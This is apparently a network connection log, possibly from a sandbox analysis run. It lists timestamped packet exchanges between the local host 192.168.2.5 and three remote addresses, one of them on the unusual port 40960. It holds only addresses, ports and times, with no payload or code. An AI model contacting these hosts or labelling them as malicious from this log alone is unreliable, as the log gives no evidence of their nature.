Jun 24, 2024 00:10:19.020397902 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020402908 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020421028 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020433903 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020447016 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020488977 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020560980 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020576954 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020587921 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020605087 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020629883 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020657063 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020665884 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020677090 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020688057 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020699978 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020709991 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020719051 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020726919 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020731926 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020736933 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020783901 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020843029 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020853043 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020860910 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.020885944 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.020911932 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021001101 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021011114 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021020889 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021030903 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021042109 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021049976 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021051884 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021097898 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021106958 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021116018 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021117926 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021126032 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021157980 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021193027 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021218061 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021228075 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021236897 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021248102 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021255970 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021258116 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021312952 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021347046 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021389961 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021491051 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021501064 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021511078 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021521091 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021529913 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021533966 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021538973 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021549940 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021559000 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021569967 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021594048 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021616936 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021652937 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021699905 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021711111 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021720886 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021730900 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021739006 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021739960 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021749973 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021759033 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.021768093 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.021816969 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.035331964 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.035343885 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.035365105 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.035382986 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.035384893 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.035393953 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.035404921 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.035413027 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.035423994 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.035456896 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.035494089 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.056905031 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.056956053 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.057054043 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057064056 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057074070 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057082891 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057104111 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057106018 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.057115078 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057123899 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057132006 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057141066 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057149887 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057158947 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057159901 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.057169914 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057183027 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057209969 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.057210922 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057221889 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.057241917 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.057271004 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.070943117 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.070955992 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.070990086 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.071012020 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.071098089 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.071110010 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.071118116 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.071135998 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.071166039 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.071230888 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.071240902 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.071286917 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.071316004 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.078344107 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.078362942 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.078445911 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.078855991 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.078922987 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.080003023 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.080080986 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.080981016 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.081062078 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.108501911 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.108514071 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.108522892 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.108577967 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.108592033 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.108602047 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.108612061 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.108622074 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.108634949 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.108676910 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.109307051 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109368086 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109369040 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.109378099 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109404087 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.109431028 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.109503984 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109514952 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109524965 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109534979 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109548092 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.109589100 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.109697104 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109707117 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109716892 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109728098 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109740019 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.109769106 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.109807968 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109817028 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109827042 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.109850883 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.109884024 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110059977 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110069036 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110081911 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110102892 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110129118 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110236883 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110246897 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110255957 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110266924 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110281944 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110321999 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110337019 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110346079 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110354900 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110366106 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110383034 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110399008 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110434055 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110449076 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110459089 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110496044 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110584021 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110593081 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110601902 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110611916 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110622883 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110632896 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110644102 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110650063 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110675097 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110711098 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110774040 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110783100 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110791922 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110842943 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110872030 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110879898 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110888004 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110898972 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110918999 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.110929966 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110939026 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.110951900 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.111001968 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.111016035 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.111025095 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.111033916 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.111073017 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.111208916 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.111227989 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.111238956 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.111247063 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.111249924 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.111259937 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.111268997 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.111285925 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.111323118 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.225418091 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.227158070 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.232338905 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.290704012 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.290723085 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.290796995 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.291414976 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.291484118 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.292311907 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.292385101 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.292555094 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.292618990 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.293262005 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.293330908 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.294167995 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.294240952 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.295213938 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.295289993 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.502376080 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.502413034 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.502474070 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.502547979 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.502552032 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.502585888 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.502613068 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.502652884 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.502693892 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.502772093 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.503004074 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.503074884 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.503474951 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.503566980 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.503957987 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.504028082 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.504441023 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.504523993 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.504718065 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.504784107 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.505343914 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.505426884 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.505527973 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.505592108 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.505603075 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.505763054 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.505862951 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.505924940 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.506531000 CEST	49724	443	192.168.2.5	58.65.168.132
Jun 24, 2024 00:10:19.506544113 CEST	443	49724	58.65.168.132	192.168.2.5
Jun 24, 2024 00:10:19.517435074 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.558046103 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.712213993 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.717103004 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.717113018 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.717173100 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.717238903 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.717257977 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.717266083 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.717273951 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.717281103 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.717313051 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.717315912 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.717320919 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.717335939 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.717369080 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.717408895 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.717417002 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.717451096 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.717475891 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.717494965 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.721947908 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.721990108 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.721997976 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.722001076 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.722007990 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.722042084 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.722065926 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.722080946 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.722126007 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.722135067 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.722178936 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.722235918 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.722244024 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.722254038 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.722271919 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.722290993 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.722297907 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.722317934 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.722352028 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.722409010 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.722417116 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.722419977 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.722476959 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.726865053 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.726914883 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.726974964 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.730398893 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730458021 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.730559111 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730566978 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730573893 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730627060 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.730644941 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.730647087 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730657101 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730664015 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730671883 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730679989 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730686903 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730694056 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730707884 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.730727911 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730736971 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.730740070 CEST	40960	49707	185.215.113.67	192.168.2.5
